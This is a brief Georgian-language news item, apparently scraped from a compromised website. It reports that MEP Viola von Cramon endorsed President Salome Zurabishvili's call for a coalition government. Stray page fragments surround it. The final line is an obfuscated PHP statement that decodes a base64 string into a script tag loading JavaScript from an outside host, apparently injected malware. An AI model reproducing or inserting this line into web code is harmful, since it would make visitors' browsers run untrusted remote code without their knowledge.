celsiusi
ავერსი საქკაბელი
ევროპარლამენტარი ვიოლა ფონ კრამონი კოალიციურ მთავრობასთან დაკავშირებით საქართველოს პრეზიდენტის სალომე ზურაბიშვილის განცხადებას „ტვიტერში“ ეხმიანება.
 
„მნიშვნელოვანი განცხადება საქართველოს პრეზიდენტისგან. მისი როლი მომდევნო კვირებში შესაძლოა, გადამწყვეტი იყოს“, – წერს ევროპარლამენტარი.
 
ცნობისთვის, პრეზიდენტმა კოალიციური მმართველობის აუცილებლობაზე ფრანგული გამომცემლობა „კვირის ჟურნალისთვის“ მიცემულ ინტერვიუში ისაუბრა.
 
„9 წლის განმავლობაში სახელისუფლებო უმრავლესობის მიერ დაკომპლექტებული მთავრობის შემდეგ, ნათელია, რომ კოალიციური მთავრობა აუცილებელია“, - განაცხადა სალომე ზურაბიშვილმა.
1114
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");